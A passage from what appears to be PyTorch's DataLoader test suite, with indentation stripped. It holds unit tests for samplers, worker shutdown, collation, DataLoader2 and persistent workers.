self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == len(self.dataset))
# test sample without replacement and with specified num_samples
n = len(self.dataset) * 2
sampler_without_replacement = RandomSampler(self.dataset, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == len(self.dataset))
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == n)
n = len(self.dataset) - 1
sampler_without_replacement = RandomSampler(self.dataset, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 0)
self.assertTrue(minval >= 0)
self.assertTrue(maxval < len(self.dataset))
self.assertTrue(count_total == n)
n = len(self.dataset) + 1
sampler_without_replacement = RandomSampler(self.dataset, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 1)
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == n)
# raise error when replacement is non-boolean
with self.assertRaisesRegex(TypeError, "replacement should be a boolean value, but got replacement=0"):
RandomSampler(self.dataset, replacement=0)
def test_random_sampler_len_with_replacement(self):
from torch.utils.data import RandomSampler
# add 5 extra samples
num_samples = len(self.dataset) + 5
sampler = RandomSampler(self.dataset,
replacement=True,
num_samples=num_samples)
# test len method
self.assertEqual(num_samples, len(sampler))
# test with iteration
count_num_samples = sum(1 for _ in sampler)
self.assertEqual(num_samples, count_num_samples)
# test with dataloader, batch_size = 1
batch_size = 1
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples, count_num_samples_in_data_loader)
# test with dataloader, batch_size = 6
batch_size = 6
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(int(math.ceil(float(num_samples) / batch_size)),
count_num_samples_in_data_loader)
def test_random_sampler_len_without_replacement(self):
from torch.utils.data import RandomSampler
# add 5 extra samples
num_samples = len(self.dataset) + 5
sampler = RandomSampler(self.dataset,
replacement=False,
num_samples=num_samples)
# test len method
self.assertEqual(num_samples, len(sampler))
# test with iteration
count_num_samples = sum(1 for _ in sampler)
self.assertEqual(num_samples, count_num_samples)
# test with dataloader, batch_size = 1
batch_size = 1
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples, count_num_samples_in_data_loader)
# test with dataloader, batch_size = 6
batch_size = 6
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples // batch_size + (num_samples % batch_size > 0),
count_num_samples_in_data_loader)
def test_distributed_sampler_invalid_rank(self):
from torch.utils.data.distributed import DistributedSampler
dataset = torch.IntTensor(range(10))
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, 3)
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, -1)
def test_duplicating_data_with_drop_last(self):
from torch.utils.data.distributed import DistributedSampler
num_processes = 4
num_batches = 9
data_set = torch.IntTensor(range(num_batches))
scanned_data = torch.IntTensor([])
for i in range(num_processes):
s = DistributedSampler(data_set, num_processes, i)
d_loader = self._get_data_loader(data_set, batch_size=int(num_batches / num_processes), drop_last=True, sampler=s)
for data in d_loader:
scanned_data = torch.cat((scanned_data, data), 0)
self.assertEqual(scanned_data.size(), scanned_data.unique().size())
def test_sampler_reproducibility(self):
from torch.utils.data import RandomSampler, WeightedRandomSampler, SubsetRandomSampler
weights = [0.1, 0.9, 0.4, 0.7, 3.0, 0.6]
for fn in (
lambda: RandomSampler(self.dataset, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: RandomSampler(self.dataset, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: SubsetRandomSampler(range(10), generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
for sampler in (
RandomSampler(self.dataset, num_samples=5, replacement=True),
RandomSampler(self.dataset, replacement=False),
WeightedRandomSampler(weights, num_samples=5, replacement=True),
WeightedRandomSampler(weights, num_samples=5, replacement=False),
SubsetRandomSampler(range(10)),
):
torch.manual_seed(0)
l1 = list(sampler) + list(sampler)
torch.manual_seed(0)
l2 = list(sampler) + list(sampler)
self.assertEqual(l1, l2)
its = (iter(sampler), iter(sampler))
ls = ([], [])
for idx in range(len(sampler)):
for i in range(2):
if idx == 0:
torch.manual_seed(0)
ls[i].append(next(its[i]))
self.assertEqual(ls[0], ls[1])
def _test_sampler(self, **kwargs):
indices = range(2, 12) # using a regular iterable
dl = self._get_data_loader(self.dataset, sampler=indices, batch_size=2, **kwargs)
self.assertEqual(len(dl), 5)
for i, (input, _target) in enumerate(dl):
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[i * 2 + 2:i * 2 + 4])
def test_sampler(self):
self._test_sampler()
self._test_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_batch_sampler(num_workers=4, multiprocessing_context='spawn')
def _test_batch_sampler(self, **kwargs):
# [(0, 1), (2, 3, 4), (5, 6), (7, 8, 9), ...]
batches = [] # using a regular iterable
for i in range(0, 20, 5):
batches.append(tuple(range(i, i + 2)))
batches.append(tuple(range(i + 2, i + 5)))
dl = self._get_data_loader(self.dataset, batch_sampler=batches, **kwargs)
self.assertEqual(len(dl), 8)
for i, (input, _target) in enumerate(dl):
if i % 2 == 0:
offset = i * 5 // 2
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[offset:offset + 2])
else:
offset = i * 5 // 2
self.assertEqual(len(input), 3)
self.assertEqual(input, self.data[offset:offset + 3])
def test_batch_sampler(self):
self._test_batch_sampler()
self._test_batch_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_batch_sampler(num_workers=4, multiprocessing_context='spawn')
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy(self):
import numpy as np
class TestDataset(torch.utils.data.Dataset):
def __getitem__(self, i):
return np.ones((2, 3, 4)) * i
def __len__(self):
return 1000
loader = self._get_data_loader(TestDataset(), batch_size=12)
batch = next(iter(loader))
self.assertIsInstance(batch, torch.DoubleTensor)
self.assertEqual(batch.size(), torch.Size([12, 2, 3, 4]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_gen_state(self):
from torch.utils.data._utils.worker import _generate_state
# Using NumPy generated states as the reference to test `_generate_state`
# having the same result.
# Test case: ((worker_id, base_seed), expected_state)
test_cases = [
((4, 13434589827475259383), (2884386318, 1088094898, 3523808998, 3860348662)),
((1, 15014285634777110771), (1934848465, 763213760, 2959016433, 179751970)),
((10, 978296274032934101), (1759791917, 3550927336, 1225977135, 1036538043)),
((12, 11868770762134256968), (3974661794, 3331131333, 3630387033, 2885815368)),
((9, 15378787925219019706), (3815056996, 3162224466, 2735102421, 3190253477)),
((5, 9055612723125076328), (3522565701, 3368424109, 959377806, 621878693)),
((15, 14617792358407278405), (3402479508, 1588702753, 1169536393, 3675067356)),
((9, 17363320784006640087), (957989458, 2518334477, 1421725660, 3086155459)),
((12, 480002904169484764), (2732851467, 1762620729, 4055801988, 1277640511)),
((15, 16803975943592702950), (3479415043, 4022359553, 295994005, 3358606349)),
((9, 11704776406047813044), (1968928009, 710113752, 2442656196, 1587420279)),
((10, 16357891985431864516), (1271733898, 4197047399, 3727213786, 2338547348)),
((2, 17423369006318065007), (544294336, 1911284083, 3299147734, 3231058347)),
((2, 2889492011444113593), (3721591783, 2595811276, 2212881745, 977682627)),
((0, 8979703111668486195), (4276723937, 2556068849, 2962827292, 233130238)),
((6, 6269787272229682235), (2548857855, 1216457374, 1012973562, 2999759647))
]
for (worker_id, base_seed), exp in test_cases:
self.assertEqual(exp, _generate_state(base_seed, worker_id))
def test_error(self):
self._test_error(self._get_data_loader(ErrorDataset(100), batch_size=2, shuffle=True))
def test_error_workers(self):
self._test_error(self._get_data_loader(ErrorDataset(41), batch_size=2, shuffle=True, num_workers=4))
@unittest.skipIf(IS_WINDOWS, "FIXME: stuck test")
def test_partial_workers(self):
r"""Check that workers exit even if the iterator is not exhausted."""
if TEST_CUDA:
pin_memory_configs = (True, False)
else:
pin_memory_configs = (False,)
for pin_memory in pin_memory_configs:
loader = iter(self._get_data_loader(self.dataset, batch_size=2, num_workers=4, pin_memory=pin_memory))
workers = loader._workers
if pin_memory:
pin_memory_thread = loader._pin_memory_thread
for i, _ in enumerate(loader):
if i == 10:
break
assert i == 10
del loader
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive(), 'subprocess not terminated')
if pin_memory:
pin_memory_thread.join(JOIN_TIMEOUT)
self.assertFalse(pin_memory_thread.is_alive())
# Takes 2.5min to finish, see https://github.com/pytorch/pytorch/issues/46065
@skipIfRocm
@unittest.skipIf(not HAS_PSUTIL, "psutil not found")
@slowTest
def test_proper_exit(self):
(r'''There might be ConnectionResetError or leaked semaphore warning '''
r'''(due to dirty process exit), but they are all safe to ignore''')
# TODO: test the case where the pin_memory_thread triggers an
# error/fatal signal. I haven't found out how to properly do that.
for is_iterable_dataset, use_workers, pin_memory, hold_iter_reference in \
itertools.product([True, False], repeat=4):
# `hold_iter_reference` specifies whether we hold a reference to the
# iterator. This is interesting because Python3 error traces holds a
# reference to the frames, which hold references to all the local
# variables including the iterator, and then the iterator dtor may
# not be called before process end. It is important to see that the
# processes still exit in both cases.
if pin_memory and (not TEST_CUDA or NO_MULTIPROCESSING_SPAWN or IS_WINDOWS):
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# DataLoader with pin_memory=True initializes CUDA when its iterator is constructed.
# For windows, pin_memory sometimes causes CUDA oom.
continue
# `exit_method` controls the way the loader process ends.
# - `*_kill` means that `*` is killed by OS.
# - `*_error` means that `*` raises an error.
# - `None` means that no error happens.
# In all cases, all processes should end properly.
if use_workers:
exit_methods = [None, 'loader_error', 'loader_kill', 'worker_error', 'worker_kill']
persistent_workers = self.persistent_workers
else:
exit_methods = [None, 'loader_error', 'loader_kill']
persistent_workers = False
for exit_method in exit_methods:
if exit_method == 'worker_kill':
# FIXME: This sometimes hangs. See #16608.
continue
desc = []
desc.append('is_iterable_dataset={}'.format(is_iterable_dataset))
desc.append('use_workers={}'.format(use_workers))
desc.append('pin_memory={}'.format(pin_memory))
desc.append('hold_iter_reference={}'.format(hold_iter_reference))
desc.append('exit_method={}'.format(exit_method))
desc = 'test_proper_exit with ' + ', '.join(desc)
# Event that the loader process uses to signal testing process
# that various things are setup, including that the worker pids
# are specified in `worker_pids` array.
loader_setup_event = mp.Event()
# Event that this process has finished setting up, and the
# loader process can now proceed to trigger error events or
# finish normally.
tester_setup_event = mp.Event()
loader_p = ErrorTrackingProcess(target=_test_proper_exit,
args=(is_iterable_dataset, use_workers, pin_memory,
exit_method, hold_iter_reference,
loader_setup_event, tester_setup_event,
persistent_workers),
disable_stderr=False)
loader_p.start()
loader_psutil_p = psutil.Process(loader_p.pid)
# Wait for loader process to set everything up, e.g., starting
# workers.
loader_setup_event.wait(timeout=JOIN_TIMEOUT)
if not loader_setup_event.is_set():
fail_msg = desc + ': loader process failed to setup within given time'
if loader_p.exception is not None:
fail_msg += ', and had exception {}'.format(loader_p.exception)
elif not loader_p.is_alive():
fail_msg += ', and exited with code {} but had no exception'.format(loader_p.exitcode)
else:
fail_msg += ', and is still alive.'
if loader_p.is_alive():
# this may kill the process, needs to run after the above lines
loader_p.print_traces_of_all_threads()
self.fail(fail_msg)
# We are certain that the workers have started now.
worker_psutil_ps = loader_psutil_p.children()
def fail(reason):
report_psutil_attrs = ['pid', 'name', 'cpu_times', 'io_counters',
'memory_full_info', 'num_ctx_switches',
'open_files', 'threads', 'status',
'nice', 'ionice']
if reason is None:
err_msg = desc
else:
err_msg = '{}: {}'.format(desc, reason)
err_msg += '\nLoader info:\n\t'
if loader_psutil_p.is_running():
err_msg += str(loader_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
loader_p.print_traces_of_all_threads()
else:
err_msg += 'exited with code {}'.format(loader_p.exitcode)
if use_workers:
err_msg += '\nWorker(s) info:'
for idx, worker_psutil_p in enumerate(worker_psutil_ps):
err_msg += '\n\tWorker {}:\n\t\t'.format(idx)
if worker_psutil_p.is_running():
err_msg += str(worker_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
print_traces_of_all_threads(worker_psutil_p.pid)
else:
err_msg += 'exited with unknown code'
self.fail(err_msg)
tester_setup_event.set()
try:
loader_p.join(JOIN_TIMEOUT + MP_STATUS_CHECK_INTERVAL)
if loader_p.is_alive():
fail_reason = 'loader process did not terminate'
if loader_p.exception is not None:
fail(fail_reason + ', and had exception {}'.format(loader_p.exception))
else:
fail(fail_reason + ', and had no exception')
_, alive = psutil.wait_procs(worker_psutil_ps, timeout=(MP_STATUS_CHECK_INTERVAL + JOIN_TIMEOUT))
if len(alive) > 0:
fail('worker process (pid(s) {}) did not terminate'.format(
', '.join(str(p.pid) for p in alive)))
if exit_method is None:
if loader_p.exitcode != 0:
fail('loader process had nonzero exitcode {}'.format(loader_p.exitcode))
else:
if loader_p.exitcode == 0:
fail('loader process had zero exitcode')
if exit_method == 'loader_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Loader error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_kill':
if isinstance(loader_p.exception, RuntimeError):
if 'DataLoader worker (pid' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif isinstance(loader_p.exception, ConnectionRefusedError):
# Sometimes, when the worker is being killed and is freeing its
# resources, the unpickling in loader process will be met an
# a `ConnectionRefusedError` as it can not open a socket to receive
# resource. In such cases, the worker may not have fully exited,
# and the loader can't know this via `is_alive` check or `SIGCHLD`
# handler. So we permit this as an allowed error as well.
# After all, we are happy as long as it terminates.
pass
else:
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Worker error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
finally:
loader_p.terminate()
def test_len(self):
def check_len(dl, expected):
self.assertEqual(len(dl), expected)
n = 0
for _ in dl:
n += 1
self.assertEqual(n, expected)
check_len(self.dataset, 100)
check_len(self._get_data_loader(self.dataset, batch_size=2), 50)
check_len(self._get_data_loader(self.dataset, batch_size=3), 34)
def test_iterabledataset_len(self):
class IterableDataset(torch.utils.data.IterableDataset):
def __len__(self):
return 10
def __iter__(self):
return iter(range(10))
iterable_loader = DataLoader(IterableDataset(), batch_size=1)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=1, drop_last=True)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=2)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=2, drop_last=True)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=3)
self.assertEqual(len(iterable_loader), 4)
iterable_loader = DataLoader(IterableDataset(), batch_size=3, drop_last=True)
self.assertEqual(len(iterable_loader), 3)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_scalars(self):
import numpy as np
class ScalarDataset(torch.utils.data.Dataset):
def __init__(self, dtype):
self.dtype = dtype
def __getitem__(self, i):
return self.dtype()
def __len__(self):
return 4
dtypes = {
np.float64: torch.DoubleTensor,
np.float32: torch.FloatTensor,
np.float16: torch.HalfTensor,
np.int64: torch.LongTensor,
np.int32: torch.IntTensor,
np.int16: torch.ShortTensor,
np.int8: torch.CharTensor,
np.uint8: torch.ByteTensor,
}
for dt, tt in dtypes.items():
dset = ScalarDataset(dt)
loader = self._get_data_loader(dset, batch_size=2)
batch = next(iter(loader))
self.assertIsInstance(batch, tt)
def test_default_convert_mapping_keep_type(self):
data = CustomDict({"a": 1, "b": 2})
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, data)
def test_default_convert_sequence_keep_type(self):
data = CustomList([1, 2, 3])
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, data)
def test_default_convert_sequence_dont_keep_type(self):
data = range(2)
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, [0, 1])
def test_default_collate_dtype(self):
arr = [1, 2, -1]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.int64)
arr = [1.1, 2.3, -0.9]
collated = _utils.collate.default_collate(arr)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.float64)
arr = [True, False]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.bool)
# Should be a no-op
arr = ['a', 'b', 'c']
self.assertEqual(arr, _utils.collate.default_collate(arr))
def test_default_collate_mapping_keep_type(self):
batch = [CustomDict({"a": 1, "b": 2}), CustomDict({"a": 3, "b": 4})]
collated = _utils.collate.default_collate(batch)
expected = CustomDict({"a": torch.tensor([1, 3]), "b": torch.tensor([2, 4])})
self.assertEqual(collated, expected)
def test_default_collate_sequence_keep_type(self):
batch = [CustomList([1, 2, 3]), CustomList([4, 5, 6])]
collated = _utils.collate.default_collate(batch)
expected = CustomList([
torch.tensor([1, 4]),
torch.tensor([2, 5]),
torch.tensor([3, 6]),
])
self.assertEqual(collated, expected)
def test_default_collate_sequence_dont_keep_type(self):
batch = [range(2), range(2)]
collated = _utils.collate.default_collate(batch)
self.assertEqual(collated, [torch.tensor([0, 0]), torch.tensor([1, 1])])
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_bad_numpy_types(self):
import numpy as np
# Should be a no-op
arr = np.array(['a', 'b', 'c'])
self.assertEqual(arr, _utils.collate.default_collate(arr))
arr = np.array([[['a', 'b', 'c']]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([object(), object(), object()])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([[[object(), object(), object()]]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_numpy_memmap(self):
import numpy as np
with tempfile.TemporaryFile() as f:
arr = np.array([[0, 1], [2, 3], [4, 5], [6, 7]])
arr_memmap = np.memmap(f, dtype=arr.dtype, mode='w+', shape=arr.shape)
arr_memmap[:] = arr[:]
arr_new = np.memmap(f, dtype=arr.dtype, mode='r', shape=arr.shape)
tensor = _utils.collate.default_collate(list(arr_new))
self.assertTrue((tensor == tensor.new_tensor([[0, 1], [2, 3], [4, 5], [6, 7]])).all().item())
def test_default_collate_bad_sequence_type(self):
batch = [['X'], ['X', 'X']]
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch))
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch[::-1]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_shared_tensor(self):
import numpy as np
t_in = torch.zeros(1)
n_in = np.zeros(1)
self.assertEqual(t_in.is_shared(), False)
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), False)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), False)
# FIXME: fix the following hack that makes `default_collate` believe
# that it is in a worker process (since it tests
# `get_worker_info() != None`), even though it is not.
old = _utils.worker._worker_info
try:
_utils.worker._worker_info = 'x'
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), True)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), True)
finally:
_utils.worker._worker_info = old
def test_excessive_thread_creation_warning(self):
with self.assertWarnsRegex(
UserWarning,
r"excessive worker creation might get DataLoader running slow or even freeze"):
dataloader = DataLoader(self.dataset, batch_size=2, num_workers=1000)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader2(TestCase):
@skipIfNoDill
def test_basics(self):
# TODO(VitalyFedyunin): This test will start breaking if we remove guaranteed order
# of traversing workers
dp = IterableWrapper(list(range(1000)))
dl = DataLoader(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2)
dl2 = DataLoader2(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2)
dl2_threading = DataLoader2(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2, parallelism_mode='thread')
self.assertEqual(list(dl), list(dl2))
self.assertEqual(list(dl), list(dl2_threading))
def test_shuffle(self):
items = list(range(1000))
dp = IterableWrapper(items).sharding_filter().shuffle()
dl = DataLoader2(dp, batch_size=None, num_workers=2, shuffle=False)
self.assertEqual(items, list(dl))
dl = DataLoader(dp, batch_size=None, num_workers=2, shuffle=False,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
self.assertEqual(items, list(dl))
dl = DataLoader2(dp, batch_size=None, num_workers=2, shuffle=True)
self.assertNotEqual(items, list(dl))
self.assertEqual(items, sorted(list(dl)))
dl = DataLoader(dp, batch_size=None, num_workers=2, shuffle=True,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
self.assertNotEqual(items, list(dl))
self.assertEqual(items, sorted(list(dl)))
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader2_EventLoop(TestCase):
@skipIfNoDill
def test_basic_threading(self):
def clean_me(process, req_queue, res_queue):
req_queue.put(communication.messages.TerminateRequest())
_ = res_queue.get()
process.join()
it = list(range(100))
numbers_dp = IterableWrapper(it)
(process, req_queue, res_queue, _thread_local_datapipe) = communication.eventloop.SpawnThreadForDataPipeline(numbers_dp)
process.start()
local_datapipe = communication.iter.QueueWrapper(
communication.protocol.IterDataPipeQueueProtocolClient(req_queue, res_queue))
actual = list(local_datapipe)
clean_me(process, req_queue, res_queue)
self.assertEqual(list(range(100)), actual)
@skipIfNoDill
def test_basic_mapdatapipe_threading(self):
def clean_me(process, req_queue, res_queue):
req_queue.put(communication.messages.TerminateRequest())
_ = res_queue.get()
process.join()
input_len = 100
it = list(range(input_len))
numbers_dp = SequenceWrapper(it)
(process, req_queue, res_queue, _thread_local_datapipe) = communication.eventloop.SpawnThreadForDataPipeline(
numbers_dp)
process.start()
# Functional Test: Ensure that you can retrieve every element from the Queue and DataPipe
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
actual = list(local_datapipe)
self.assertEqual([(x, x) for x in range(100)], actual)
# Functional Test: raise Error when input
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
with self.assertRaisesRegex(IndexError, "out of bound"):
local_datapipe[1000]
# __len__ Test: Ensure that the correct length is returned
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
self.assertEqual(input_len, len(local_datapipe))
clean_me(process, req_queue, res_queue)
class StringDataset(Dataset):
def __init__(self):
self.s = '12345'
def __len__(self):
return len(self.s)
def __getitem__(self, ndx):
return (self.s[ndx], ndx)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestStringDataLoader(TestCase):
def setUp(self):
super(TestStringDataLoader, self).setUp()
self.dataset = StringDataset()
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for (s, n) in loader:
self.assertIsInstance(s[0], str)
self.assertTrue(n.is_pinned())
class DictDataset(Dataset):
def __len__(self):
return 4
def __getitem__(self, ndx):
return {
'a_tensor': torch.empty(4, 2).fill_(ndx),
'another_dict': {
'a_number': ndx,
},
}
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDictDataLoader(TestCase):
def setUp(self):
super(TestDictDataLoader, self).setUp()
self.dataset = DictDataset()
def test_sequential_batch(self):
for persistent_workers in (False, True):
if persistent_workers:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers, num_workers=1)
else:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers)
batch_size = loader.batch_size
for i, sample in enumerate(loader):
idx = i * batch_size
self.assertEqual(set(sample.keys()), {'a_tensor', 'another_dict'})
self.assertEqual(set(sample['another_dict'].keys()), {'a_number'})
t = sample['a_tensor']
self.assertEqual(t.size(), torch.Size([batch_size, 4, 2]))
self.assertTrue((t[0] == idx).all())
self.assertTrue((t[1] == idx + 1).all())
n = sample['another_dict']['a_number']
self.assertEqual(n.size(), torch.Size([batch_size]))
self.assertEqual(n[0], idx)
self.assertEqual(n[1], idx + 1)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True)
for sample in loader:
self.assertTrue(sample['a_tensor'].is_pinned())
self.assertTrue(sample['another_dict']['a_number'].is_pinned())
class DummyDataset(torch.utils.data.Dataset):
def __init__(self):
self.data = list(range(10))
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
# The persistent workers always maintain the original
# dataset through the dataloader lifetime
# so the attributes will remain the same as the
# first time the workers where spawned (dataloader iteration)
assert self.start == 0
return self.data[idx]
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN, "DataLoader tests hang in ASAN, see: https://github.com/pytorch/pytorch/issues/66223")
class TestDataLoaderPersistentWorkers(TestDataLoader):
def setUp(self):
super(TestDataLoaderPersistentWorkers, self).setUp()
self.persistent_workers = True
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super(RandomDataset).__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)), multiprocessing_context="fork",
num_workers=1, persistent_workers=True):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_dataset_not_reset(self):
dataset = DummyDataset()
pin_memory_configs = [False]
if TEST_CUDA:
pin_memory_configs.append(True)
for pin_memory in pin_memory_configs:
dataloader = self._get_data_loader(dataset, num_workers=2, pin_memory=pin_memory)
dataset.start = 0
for i in range(10):
for x in dataloader:
pass
# Changing the start value here doesn't have any effect in the dataset
# cached by the workers. since they are not recreated between epochs
# and can cache values safely
dataset.start = i
class NamedTupleDataset(Dataset):
from collections import namedtuple
Batch = namedtuple('Batch', ['data', 'label', 'random_tensor'])
Data = namedtuple('Data', ['positive', 'negative'])
def __len__(self):
return 4
def __getitem__(self, ndx):
return self.Batch(data=self.Data(positive=ndx, negative=-ndx),
label=str(ndx), random_tensor=torch.randn(3))
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestNamedTupleDataLoader(TestCase):
def setUp(self):
super(TestNamedTupleDataLoader, self).setUp()
self.dataset = NamedTupleDataset()
def test_dataloader_with_namedtuple(self):
# auto-collation
loader = DataLoader(self.dataset, batch_size=2, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertIsInstance(batch.data.positive, torch.Tensor)
self.assertEqual(batch.data.positive.is_pinned(), TEST_CUDA)
# no auto-collation
loader = DataLoader(self.dataset, batch_size=None, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertNotIsInstance(batch.data.positive, torch.Tensor)
class SimpleCustomBatch(object):
def __init__(self, data):
